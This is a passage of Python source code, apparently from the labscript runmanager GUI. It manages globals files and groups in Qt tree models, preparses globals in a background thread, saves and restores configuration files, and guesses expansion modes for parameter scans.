items.append(name_item)
length = 'Unknown'
if expansion_name in dimensions:
length = "{}".format(dimensions[expansion_name])
length_item = QtGui.QStandardItem(length)
items.append(length_item)
shuffle_item = QtGui.QStandardItem()
shuffle_item.setCheckable(True)
shuffle_item.setCheckState(QtCore.Qt.Checked if shuffle else QtCore.Qt.Unchecked)
items.append(shuffle_item)
self.axes_model.appendRow(items)
@inmain_decorator() # Is called by preparser thread
def update_tabs_parsing_indication(self, active_groups, sequence_globals, evaled_globals, n_shots):
for group_tab in self.currently_open_groups.values():
group_tab.update_parse_indication(active_groups, sequence_globals, evaled_globals)
self.ui.pushButton_engage.setEnabled(True)
if n_shots == 1:
n_shots_string = '(1 shot)'
else:
n_shots_string = '({} shots)'.format(n_shots)
self.ui.pushButton_engage.setText('Engage {}'.format(n_shots_string))
def preparse_globals(self):
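# Evaluate the active globals in the background so that group tabs can show
# values and errors, and so the axes tab and shot count stay up to date.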
active_groups = self.get_active_groups()
if active_groups is None:
# There was an error, get_active_groups has already shown
# it to the user.
return
# Expansion mode is automatically updated when the global's
# type changes. If this occurs, we will have to parse again to
# include the change:
while True:
results = self.parse_globals(active_groups, raise_exceptions=False, expand_globals=False, return_dimensions = True)
sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions = results
self.n_shots = len(shots)
expansions_changed = self.guess_expansion_modes(
active_groups, evaled_globals, global_hierarchy, expansions)
if not expansions_changed:
# Now expand globals while parsing to calculate the number of shots.
# this must only be done after the expansion type guessing has been updated to avoid exceptions
# when changing a zip group from a list to a single value
results = self.parse_globals(active_groups, raise_exceptions=False, expand_globals=True, return_dimensions = True)
sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions = results
self.n_shots = len(shots)
break
self.update_tabs_parsing_indication(active_groups, sequence_globals, evaled_globals, self.n_shots)
self.update_axes_tab(expansions, dimensions)
def preparse_globals_loop(self):
"""Runs in a thread, waiting on a threading.Event that tells us when
some globals have changed, and calls parse_globals to evaluate them
all before feeding the results back to the relevant tabs to be
displayed."""
while True:
try:
# Wait until we're needed:
self.preparse_globals_required.get()
n_requests = 1
# Wait until the main thread is idle before clearing the queue of
# requests. This way if preparsing is triggered multiple times within
# the main thread before it becomes idle, we can respond to this all at
# once, once they are all done, rather than starting too early and
# having to preparse again.
with qtlock:
while True:
try:
self.preparse_globals_required.get(block=False)
n_requests += 1
except queue.Empty:
break
# Do some work:
self.preparse_globals()
# Tell any callers calling preparse_globals_required.join() that we are
# done with their request:
for _ in range(n_requests):
self.preparse_globals_required.task_done()
except Exception:
# Raise the error, but keep going so we don't take down the
# whole thread if there is a bug.
exc_info = sys.exc_info()
raise_exception_in_thread(exc_info)
def wait_until_preparse_complete(self):
"""Block until the preparse loop has finished pending work"""
self.preparse_globals_required.join()
def get_group_item_by_name(self, globals_file, group_name, column, previous_name=None):
"""Returns an item from the row representing a globals group in the
groups model. Which item is returned is set by the column argument."""
parent_item = self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME)[0]
possible_name_items = self.groups_model.findItems(group_name, QtCore.Qt.MatchRecursive,
column=self.GROUPS_COL_NAME)
# Don't accidentally match on other groups or files with the same name
# as this group:
possible_name_items = [item for item in possible_name_items if item.parent() == parent_item]
if previous_name is not None:
# Also filter by previous name, useful for telling rows apart when
# a rename is in progress and two rows may temporarily contain the
# same name (though the rename code will throw an error and revert
# it).
possible_name_items = [item for item in possible_name_items
if item.data(self.GROUPS_ROLE_PREVIOUS_NAME) == previous_name]
elif group_name != self.GROUPS_DUMMY_ROW_TEXT:
# Don't return the dummy item unless they asked for it explicitly
# - if a new group is being created, its name might be
# simultaneously present in its own row and the dummy row too.
possible_name_items = [item for item in possible_name_items
if not item.data(self.GROUPS_ROLE_IS_DUMMY_ROW)]
if len(possible_name_items) > 1:
raise LookupError('Multiple items found')
elif not possible_name_items:
raise LookupError('No item found')
name_item = possible_name_items[0]
name_index = name_item.index()
# Found the name item, get the sibling item for the column requested:
item_index = name_index.sibling(name_index.row(), column)
item = self.groups_model.itemFromIndex(item_index)
return item
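# A minimal usage sketch (hypothetical file and group names), assuming a
# globals file 'globals.h5' containing a group 'MOT' is already loaded into
# the groups model:
#
#   active_item = self.get_group_item_by_name(
#       'globals.h5', 'MOT', self.GROUPS_COL_ACTIVE)
#   active_item.setCheckState(QtCore.Qt.Checked)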
def do_model_sort(self):
header = self.ui.treeView_groups.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView_groups.sortByColumn(sort_column, sort_order)
@inmain_decorator() # Can be called from a non-main thread
def get_active_groups(self, interactive=True):
"""Returns active groups in the format {group_name: globals_file}.
Displays an error dialog and returns None if multiple groups of the
same name are selected; this is invalid, since selected groups must be
uniquely named. If interactive=False, raises the exception instead."""
active_groups = {}
for i in range(self.groups_model.rowCount()):
file_name_item = self.groups_model.item(i, self.GROUPS_COL_NAME)
for j in range(file_name_item.rowCount()):
group_name_item = file_name_item.child(j, self.GROUPS_COL_NAME)
group_active_item = file_name_item.child(j, self.GROUPS_COL_ACTIVE)
if group_active_item.checkState() == QtCore.Qt.Checked:
group_name = group_name_item.text()
globals_file = file_name_item.text()
if group_name in active_groups:
msg = (
'There are two active groups named %s. ' % group_name
+ 'Active groups must have unique names.'
)
if interactive:
error_dialog(msg)
return
raise RuntimeError(msg)
active_groups[group_name] = globals_file
return active_groups
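# The returned mapping has the form {group_name: globals_file}, for example
# (hypothetical paths): {'MOT': 'C:/experiments/globals.h5',
#                        'imaging': 'C:/experiments/globals.h5'}.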
def open_globals_file(self, globals_file):
# Do nothing if this file is already open:
if self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME):
return
# Get the groups:
groups = runmanager.get_grouplist(globals_file)
# Add the parent row:
file_name_item = QtGui.QStandardItem(globals_file)
file_name_item.setEditable(False)
file_name_item.setToolTip(globals_file)
# Sort column by name:
file_name_item.setData(globals_file, self.GROUPS_ROLE_SORT_DATA)
file_active_item = QtGui.QStandardItem()
file_active_item.setCheckState(QtCore.Qt.Unchecked)
# Sort column by CheckState - must keep this updated when checkstate changes:
file_active_item.setData(QtCore.Qt.Unchecked, self.GROUPS_ROLE_SORT_DATA)
file_active_item.setEditable(False)
file_active_item.setToolTip('Check to set all the file\'s groups as active.')
file_delete_item = QtGui.QStandardItem() # Blank, only groups have a delete button
file_delete_item.setEditable(False)
# Must be set to something so that the dummy row doesn't get sorted first:
file_delete_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
file_close_item = QtGui.QStandardItem()
file_close_item.setIcon(QtGui.QIcon(':qtutils/fugue/cross'))
file_close_item.setEditable(False)
file_close_item.setToolTip('Close globals file.')
self.groups_model.appendRow([file_name_item, file_active_item, file_delete_item, file_close_item])
# Add the groups as children:
for group_name in groups:
row = self.make_group_row(group_name)
file_name_item.appendRow(row)
# Finally, add the <Click to add group> row at the bottom:
dummy_name_item = QtGui.QStandardItem(self.GROUPS_DUMMY_ROW_TEXT)
dummy_name_item.setToolTip('Click to add group')
# This lets later code know that this row does
# not correspond to an actual globals group:
dummy_name_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_name_item.setData(self.GROUPS_DUMMY_ROW_TEXT, self.GROUPS_ROLE_PREVIOUS_NAME)
dummy_name_item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable) # Clears the 'selectable' flag
dummy_active_item = QtGui.QStandardItem()
dummy_active_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_active_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_delete_item = QtGui.QStandardItem()
dummy_delete_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_delete_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_open_close_item = QtGui.QStandardItem()
dummy_open_close_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_open_close_item.setFlags(QtCore.Qt.NoItemFlags)
# Not setting anything as the above items' sort role has the effect of
# ensuring this row is always sorted to the end of the list, without
# us having to implement any custom sorting methods or subclassing
# anything, yay.
file_name_item.appendRow([dummy_name_item, dummy_active_item, dummy_delete_item, dummy_open_close_item])
# Expand the child items to be visible:
self.ui.treeView_groups.setExpanded(file_name_item.index(), True)
self.globals_changed()
self.do_model_sort()
# If this changed the sort order, ensure the file item is visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, file_name_item)
def make_group_row(self, group_name):
"""Returns a new row representing one group in the groups tab, ready to be
inserted into the model."""
group_name_item = QtGui.QStandardItem(group_name)
# We keep the previous name around so that we can detect what changed:
group_name_item.setData(group_name, self.GROUPS_ROLE_PREVIOUS_NAME)
# Sort column by name:
group_name_item.setData(group_name, self.GROUPS_ROLE_SORT_DATA)
group_active_item = QtGui.QStandardItem()
group_active_item.setCheckState(QtCore.Qt.Unchecked)
# Sort column by CheckState - must keep this updated whenever the
# checkstate changes:
group_active_item.setData(QtCore.Qt.Unchecked, self.GROUPS_ROLE_SORT_DATA)
group_active_item.setEditable(False)
group_active_item.setToolTip(
'Whether or not the globals within this group should be used by runmanager for compilation.')
group_delete_item = QtGui.QStandardItem()
group_delete_item.setIcon(QtGui.QIcon(':qtutils/fugue/minus'))
# Must be set to something so that the dummy row doesn't get sorted first:
group_delete_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
group_delete_item.setEditable(False)
group_delete_item.setToolTip('Delete globals group from file.')
group_open_close_item = QtGui.QStandardItem()
group_open_close_item.setIcon(QtGui.QIcon(':qtutils/fugue/plus'))
group_open_close_item.setData(False, self.GROUPS_ROLE_GROUP_IS_OPEN)
# Sort column by whether group is open - must keep this manually
# updated when the state changes:
group_open_close_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
group_open_close_item.setEditable(False)
group_open_close_item.setToolTip('Load globals group into runmanager.')
row = [group_name_item, group_active_item, group_delete_item, group_open_close_item]
return row
def close_globals_file(self, globals_file, confirm=True):
item = self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME)[0]
# Close any open groups in this globals file:
child_name_items = [item.child(i, self.GROUPS_COL_NAME) for i in range(item.rowCount())]
child_openclose_items = [item.child(i, self.GROUPS_COL_OPENCLOSE) for i in range(item.rowCount())]
child_is_open = [child_item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
for child_item in child_openclose_items]
if confirm and any(child_is_open):
if not question_dialog('Close %s? This will close %d currently open group(s).' %
(globals_file, child_is_open.count(True))):
return
to_close = [name_item for name_item, is_open in zip(child_name_items, child_is_open) if is_open]
for name_item in to_close:
group_name = name_item.text()
self.close_group(globals_file, group_name)
# Remove the globals file from the model:
self.groups_model.removeRow(item.row())
self.globals_changed()
def copy_group(self, source_globals_file, source_group_name, dest_globals_file=None, delete_source_group=False):
"""This function copys a group of globals with the name source_group_name from the file
source_globals_file to a new file dest_globals_file. If delete_source_group is True
the source group is deleted after copying"""
if delete_source_group and source_globals_file == dest_globals_file:
return
try:
dest_group_name = runmanager.copy_group(source_globals_file, source_group_name, dest_globals_file, delete_source_group)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created globals group into the model, as a
# child row of the new globals file.
if dest_globals_file is None:
dest_globals_file = source_globals_file
# Find the new group's parent row by filepath
for index in range(self.groups_model.rowCount()):
if self.groups_model.item(index, self.GROUPS_COL_NAME).text() == dest_globals_file:
parent_row = self.groups_model.item(index)
break
last_index = parent_row.rowCount()
# Insert it as the row before the last (dummy) row:
group_row = self.make_group_row(dest_group_name)
parent_row.insertRow(last_index - 1, group_row)
self.do_model_sort()
# Open the group
self.open_group(dest_globals_file, dest_group_name)
name_item = group_row[self.GROUPS_COL_NAME]
self.globals_changed()
self.ui.treeView_groups.setCurrentIndex(name_item.index())
# delete original
if delete_source_group:
self.delete_group(source_globals_file, source_group_name, confirm=False)
# If this changed the sort order, ensure the group item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, name_item)
def new_group(self, globals_file, group_name):
item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME,
previous_name=self.GROUPS_DUMMY_ROW_TEXT)
try:
runmanager.new_group(globals_file, group_name)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created globals group into the model, as a
# child row of the globals file it belongs to.
group_row = self.make_group_row(group_name)
last_index = item.parent().rowCount()
# Insert it as the row before the last (dummy) row:
item.parent().insertRow(last_index - 1, group_row)
self.do_model_sort()
# Open the group and mark it active:
self.open_group(globals_file, group_name)
active_item = group_row[self.GROUPS_COL_ACTIVE]
name_item = group_row[self.GROUPS_COL_NAME]
active_item.setCheckState(QtCore.Qt.Checked)
self.globals_changed()
self.ui.treeView_groups.setCurrentIndex(name_item.index())
# If this changed the sort order, ensure the group item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, name_item)
finally:
# Set the dummy row's text back ready for another group to be created:
item.setText(self.GROUPS_DUMMY_ROW_TEXT)
def open_group(self, globals_file, group_name, trigger_preparse=True):
assert (globals_file, group_name) not in self.currently_open_groups # sanity check
group_tab = GroupTab(self.ui.tabWidget, globals_file, group_name)
self.currently_open_groups[globals_file, group_name] = group_tab
# Set the open/close state in the groups_model. itemChanged will be
# emitted and self.on_groups_model_item_changed will handle updating
# the other data roles, icons etc:
openclose_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_OPENCLOSE)
openclose_item.setData(True, self.GROUPS_ROLE_GROUP_IS_OPEN)
# Trigger a preparse to occur in light of this. Calling code can
# disable this so that multiple groups can be opened at once without
# triggering a preparse. If they do so, they should call
# self.globals_changed() themselves.
if trigger_preparse:
self.globals_changed()
def rename_group(self, globals_file, previous_group_name, new_group_name):
item = self.get_group_item_by_name(globals_file, new_group_name, self.GROUPS_COL_NAME,
previous_name=previous_group_name)
try:
runmanager.rename_group(globals_file, previous_group_name, new_group_name)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old name, since the rename failed:
item.setText(previous_group_name)
else:
item.setData(new_group_name, self.GROUPS_ROLE_PREVIOUS_NAME)
item.setData(new_group_name, self.GROUPS_ROLE_SORT_DATA)
self.do_model_sort()
# If this changed the sort order, ensure the group item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, item)
group_tab = self.currently_open_groups.pop((globals_file, previous_group_name), None)
if group_tab is not None:
# Change labels and tooltips appropriately if the group is open:
group_tab.set_file_and_group_name(globals_file, new_group_name)
# Re-add it to the dictionary under the new name:
self.currently_open_groups[globals_file, new_group_name] = group_tab
def close_group(self, globals_file, group_name):
group_tab = self.currently_open_groups.pop((globals_file, group_name), None)
assert group_tab is not None # Just in case
group_tab.close()
openclose_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_OPENCLOSE)
openclose_item.setData(False, self.GROUPS_ROLE_GROUP_IS_OPEN)
def delete_group(self, globals_file, group_name, confirm=True):
if confirm:
if not question_dialog("Delete the group '%s'?" % group_name):
return
# If the group is open, close it:
group_tab = self.currently_open_groups.get((globals_file, group_name))
if group_tab is not None:
self.close_group(globals_file, group_name)
runmanager.delete_group(globals_file, group_name)
# Find the entry for this group in self.groups_model and remove it:
name_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME)
name_item.parent().removeRow(name_item.row())
self.globals_changed()
def on_save_configuration_triggered(self):
if self.last_save_config_file is None:
self.on_save_configuration_as_triggered()
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
else:
self.save_configuration(self.last_save_config_file)
def on_revert_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
elif reply == QtWidgets.QMessageBox.Yes:
self.load_configuration(self.last_save_config_file)
else:
error_dialog('No changes to revert.')
def on_save_configuration_as_triggered(self):
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'runmanager.ini')
save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Select file to save current runmanager configuration',
default,
"config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if not save_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
save_file = os.path.abspath(save_file)
self.save_configuration(save_file)
def get_save_data(self):
# Get the currently open files and active groups:
h5_files_open = []
active_groups = []
for i in range(self.groups_model.rowCount()):
file_name_item = self.groups_model.item(i, self.GROUPS_COL_NAME)
globals_file_name = file_name_item.text()
h5_files_open.append(globals_file_name)
for j in range(file_name_item.rowCount()):
group_name_item = file_name_item.child(j, self.GROUPS_COL_NAME)
group_name = group_name_item.text()
group_active_item = file_name_item.child(j, self.GROUPS_COL_ACTIVE)
if group_active_item.checkState() == QtCore.Qt.Checked:
active_groups.append((globals_file_name, group_name))
# Get the currently open groups:
groups_open = []
for i in range(self.ui.tabWidget.count()):
tab_page = self.ui.tabWidget.widget(i)
for (globals_file_name, group_name), group_tab in self.currently_open_groups.items():
if group_tab.ui is tab_page:
groups_open.append((globals_file_name, group_name))
break
# Get the labscript file, output folder, and whether the output folder
# is default:
current_labscript_file = self.ui.lineEdit_labscript_file.text()
shot_output_folder = self.ui.lineEdit_shot_output_folder.text()
is_using_default_shot_output_folder = (shot_output_folder == self.get_default_output_folder())
# Only save the shot output folder if not using the default, that way
# the folder updating as the day rolls over will not be detected as a
# change to the save data:
if is_using_default_shot_output_folder:
shot_output_folder = ''
# Get the server hostnames:
BLACS_host = self.ui.lineEdit_BLACS_hostname.text()
send_to_runviewer = self.ui.checkBox_view_shots.isChecked()
send_to_BLACS = self.ui.checkBox_run_shots.isChecked()
shuffle = self.ui.pushButton_shuffle.isChecked()
# axes tab information
axes = []
for i in range(self.axes_model.rowCount()):
name_item = self.axes_model.item(i, self.AXES_COL_NAME)
shuffle_item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
shuffle_state = shuffle_item.checkState()
axes.append((name_item.data(self.AXES_ROLE_NAME), 1 if shuffle_state == QtCore.Qt.Checked else 0))
save_data = {'h5_files_open': h5_files_open,
'active_groups': active_groups,
'groups_open': groups_open,
'current_labscript_file': current_labscript_file,
'shot_output_folder': shot_output_folder,
'is_using_default_shot_output_folder': is_using_default_shot_output_folder,
'send_to_runviewer': send_to_runviewer,
'send_to_BLACS': send_to_BLACS,
'shuffle': shuffle,
'axes': axes,
'BLACS_host': BLACS_host}
return save_data
def save_configuration(self, save_file):
runmanager_config = LabConfig(save_file)
save_data = self.get_save_data()
self.last_save_config_file = save_file
self.last_save_data = save_data
for key, value in save_data.items():
runmanager_config.set('runmanager_state', key, pprint.pformat(value))
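# The resulting .ini file gets a [runmanager_state] section with one
# pprint-formatted entry per key of get_save_data(), roughly like this
# (illustrative values only):
#
#   [runmanager_state]
#   h5_files_open = ['C:/experiments/globals.h5']
#   active_groups = [('C:/experiments/globals.h5', 'MOT')]
#   shuffle = False
#   BLACS_host = 'localhost'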
def on_load_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'runmanager.ini')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select runmanager configuration file to load',
default,
"config files (*.ini)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
self.load_configuration(file)
def load_configuration(self, filename):
self.last_save_config_file = filename
self.ui.actionSave_configuration.setText('Save configuration %s'%filename)
# Close all files:
save_data = self.get_save_data()
for globals_file in save_data['h5_files_open']:
self.close_globals_file(globals_file, confirm=False)
# Ensure folder exists, if this was opened programmatically we are
# creating the file, so the directory had better exist!
runmanager_config = LabConfig(filename)
has_been_a_warning = [False]
def warning(message):
if not has_been_a_warning[0]:
has_been_a_warning[0] = True
self.output_box.output('\n')
self.output_box.output('Warning: %s\n' % message, red=True)
try:
h5_files_open = ast.literal_eval(runmanager_config.get('runmanager_state', 'h5_files_open'))
except Exception:
pass
else:
for globals_file in h5_files_open:
if os.path.exists(globals_file):
try:
self.open_globals_file(globals_file)
self.last_opened_globals_folder = os.path.dirname(globals_file)
except Exception:
raise_exception_in_thread(sys.exc_info())
continue
else:
self.output_box.output('\nWarning: globals file %s no longer exists\n' % globals_file, red=True)
try:
active_groups = ast.literal_eval(runmanager_config.get('runmanager_state', 'active_groups'))
except Exception:
pass
else:
for globals_file, group_name in active_groups:
try:
group_active_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_ACTIVE)
group_active_item.setCheckState(QtCore.Qt.Checked)
except LookupError:
warning("previously active group '%s' in %s no longer exists" % (group_name, globals_file))
try:
groups_open = ast.literal_eval(runmanager_config.get('runmanager_state', 'groups_open'))
except Exception:
pass
else:
for globals_file, group_name in groups_open:
# First check if it exists:
try:
self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME)
except LookupError:
warning("previously open group '%s' in %s no longer exists" % (group_name, globals_file))
else:
self.open_group(globals_file, group_name)
try:
current_labscript_file = ast.literal_eval(
runmanager_config.get('runmanager_state', 'current_labscript_file'))
except Exception:
pass
else:
if os.path.exists(current_labscript_file):
self.ui.lineEdit_labscript_file.setText(current_labscript_file)
self.last_opened_labscript_folder = os.path.dirname(current_labscript_file)
elif current_labscript_file:
warning('previously selected labscript file %s no longer exists' % current_labscript_file)
try:
shot_output_folder = ast.literal_eval(runmanager_config.get('runmanager_state', 'shot_output_folder'))
except Exception:
pass
else:
self.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
self.last_selected_shot_output_folder = os.path.dirname(shot_output_folder)
try:
is_using_default_shot_output_folder = ast.literal_eval(
runmanager_config.get('runmanager_state', 'is_using_default_shot_output_folder'))
except Exception:
pass
else:
if is_using_default_shot_output_folder:
default_output_folder = self.get_default_output_folder()
self.ui.lineEdit_shot_output_folder.setText(default_output_folder)
self.last_selected_shot_output_folder = os.path.dirname(default_output_folder)
try:
send_to_runviewer = ast.literal_eval(runmanager_config.get('runmanager_state', 'send_to_runviewer'))
except Exception:
pass
else:
self.ui.checkBox_view_shots.setChecked(send_to_runviewer)
try:
send_to_BLACS = ast.literal_eval(runmanager_config.get('runmanager_state', 'send_to_BLACS'))
except Exception:
pass
else:
self.ui.checkBox_run_shots.setChecked(send_to_BLACS)
# clear the axes model first
if self.axes_model.rowCount():
self.axes_model.removeRows(0, self.axes_model.rowCount())
# set the state of the global shuffle button. This ensures that if no axes items get loaded afterwards
# (e.g. because the globals in the .ini file are no longer expansion globals), then we still have
# an approximate state for the shuffle button that will apply to whatever globals are to be expanded.
try:
shuffle = ast.literal_eval(runmanager_config.get('runmanager_state', 'shuffle'))
except Exception:
pass
else:
if shuffle:
self.ui.pushButton_shuffle.setChecked(True)
# Now load the axes states (order and shuffle). This will also ensure the shuffle button matches the
# state of these items (since we don't save/restore the tri-state nature of the global shuffle button).
try:
axes = ast.literal_eval(runmanager_config.get('runmanager_state', 'axes'))
except Exception:
pass
else:
if isinstance(axes, list):
# clear model
for name, shuffle in axes:
self.add_item_to_axes_model(name, shuffle)
self.update_axes_indentation()
try:
BLACS_host = ast.literal_eval(runmanager_config.get('runmanager_state', 'BLACS_host'))
except Exception:
pass
else:
self.ui.lineEdit_BLACS_hostname.setText(BLACS_host)
# Set as self.last_save_data:
save_data = self.get_save_data()
self.last_save_data = save_data
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
def compile_loop(self):
while True:
try:
labscript_file, run_files, send_to_BLACS, BLACS_host, send_to_runviewer = self.compile_queue.get()
run_files = iter(run_files) # Should already be an iterator, but just in case
while True:
if self.compilation_aborted.is_set():
self.output_box.output('Compilation aborted.\n\n', red=True)
break
try:
try:
# We do next() instead of looping over run_files
# so that if compilation is aborted we won't
# create an extra file unnecessarily.
run_file = next(run_files)
except StopIteration:
self.output_box.output('Ready.\n\n')
break
else:
self.to_child.put(['compile', [labscript_file, run_file]])
signal, success = self.from_child.get()
assert signal == 'done'
if not success:
self.compilation_aborted.set()
continue
if send_to_BLACS:
self.send_to_BLACS(run_file, BLACS_host)
if send_to_runviewer:
self.send_to_runviewer(run_file)
except Exception as e:
self.output_box.output(str(e) + '\n', red=True)
self.compilation_aborted.set()
inmain(self.ui.pushButton_abort.setEnabled, False)
self.compilation_aborted.clear()
except Exception:
# Raise it so whatever bug it is gets seen, but keep going so
# the thread keeps functioning:
exc_info = sys.exc_info()
raise_exception_in_thread(exc_info)
continue
def parse_globals(self, active_groups, raise_exceptions=True, expand_globals=True, expansion_order=None, return_dimensions=False):
sequence_globals = runmanager.get_globals(active_groups)
#logger.info('got sequence globals')
evaled_globals, global_hierarchy, expansions = runmanager.evaluate_globals(sequence_globals, raise_exceptions)
#logger.info('evaluated sequence globals')
if expand_globals:
if return_dimensions:
shots, dimensions = runmanager.expand_globals(sequence_globals, evaled_globals, expansion_order, return_dimensions=return_dimensions)
else:
shots = runmanager.expand_globals(sequence_globals, evaled_globals, expansion_order)
else:
shots = []
dimensions = {}
#logger.info('expanded sequence globals')
if return_dimensions:
return sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions
else:
return sequence_globals, shots, evaled_globals, global_hierarchy, expansions
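# Note: when return_dimensions=True the caller receives a sixth element, a
# dict of axis lengths keyed by expansion name, which update_axes_tab above
# uses to display the length of each axis.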
def guess_expansion_modes(self, active_groups, evaled_globals, global_hierarchy, expansions):
"""This function is designed to be called iteratively. It changes the
expansion type of globals that reference other globals - such that
globals referencing an iterable global will be zipped with it, rather
than combined in an outer product. Each time this method is called,
self.parse_globals should also be called, so that the globals are
evaluated with their new expansion modes, if they changed. This should
be performed repeatedly until there are no more changes. Note that
this method does not return what expansion types it thinks globals
should have - it *actually writes them to the globals HDF5 file*. So
it is up to later code to ensure it re-reads the expansion mode from
the HDF5 file before proceeding. At present this method is only called
from self.preparse_globals(), so see there to see how it fits in with
everything else. This method uses four instance attributes to store
state: self.previous_evaled_globals, self.previous_global_hierarchy,
self.previous_expansion_types and self.previous_expansions. This is
necessary so that it can detect changes."""
# Do nothing if there were exceptions:
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
value = evaled_globals[group_name][global_name]
if isinstance(value, Exception):
# Let ExpansionErrors through, as they occur
# when the user has changed the value without changing
# the expansion type:
if isinstance(value, runmanager.ExpansionError):
continue
return False
# Did the guessed expansion type for any of the globals change?
expansion_types_changed = False
expansion_types = {}
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
new_value = evaled_globals[group_name][global_name]
try:
previous_value = self.previous_evaled_globals[group_name][global_name]
except KeyError:
# This variable is used to guess the expansion type
#
# If we already have an expansion specified for this, but
# don't have a previous value, then we should use the
# new_value for the guess as we are likely loading from HDF5
# file for the first time (and either way, don't want to
# overwrite what the user has put in the expansion type)
#
# If we don't have an expansion...
# then we set it to '0' which will result in an
# expansion type guess of '' (empty string). This will
# either result in nothing being done to the expansion
# type or the expansion type being found to be 'outer',
# which will then make it go through the machinery below
if global_name in expansions and expansions[global_name]:
previous_value = new_value
else:
previous_value = 0
new_guess = runmanager.guess_expansion_type(new_value)
previous_guess = runmanager.guess_expansion_type(previous_value)
if new_guess == 'outer':
expansion_types[global_name] = {'previous_guess': previous_guess,
'new_guess': new_guess,
'group_name': group_name,
'value': new_value
}
elif new_guess != previous_guess:
filename = active_groups[group_name]
runmanager.set_expansion(filename, group_name, global_name, new_guess)
expansions[global_name] = new_guess
expansion_types_changed = True
# recursively find dependencies and add them to a zip group!
def find_dependencies(global_name, global_hierarchy, expansion_types):
results = set()
for name, dependencies in global_hierarchy.items():
if name in expansion_types and global_name in dependencies:
results.add(name)
results = results.union(find_dependencies(name, global_hierarchy, expansion_types))
return results
def global_depends_on_global_with_outer_product(global_name, global_hierarchy, expansions):
if global_name not in global_hierarchy:
return False
else:
for dependency in global_hierarchy[global_name]:
if expansions[dependency]:
return True
def set_expansion_type_guess(expansion_types, expansions, global_name, expansion_to_set, new=True):
if new:
key = 'new_guess'
else:
key = 'previous_guess'
# debug logging
log_if_global(global_name, [], 'setting expansion type for new dependency' if new else 'setting expansion type for old dependencies')
# only do this if the expansion is *not* already set to a specific zip group
if global_name in expansions and expansions[global_name] != '' and expansions[global_name] != 'outer':
expansion_types[global_name][key] = expansions[global_name]
# debug logging
log_if_global(global_name, [], 'Using existing expansion %s for %s'%(expansions[global_name], global_name))
else:
expansion_types[global_name][key] = expansion_to_set
expansions[global_name] = expansion_to_set
# debug logging
log_if_global(global_name, [], 'Using new expansion %s for %s'%(expansion_to_set, global_name))
for global_name in sorted(expansion_types):
# we have a global that does not depend on anything that has an
# expansion type of 'outer'
if (not global_depends_on_global_with_outer_product(global_name, global_hierarchy, expansions)
and not isinstance(expansion_types[global_name]['value'], runmanager.ExpansionError)):
current_dependencies = find_dependencies(global_name, global_hierarchy, expansion_types)
# if this global has other globals that use it, then add them
# all to a zip group with the name of this global
if current_dependencies:
for dependency in current_dependencies:
set_expansion_type_guess(expansion_types, expansions, dependency, str(global_name))
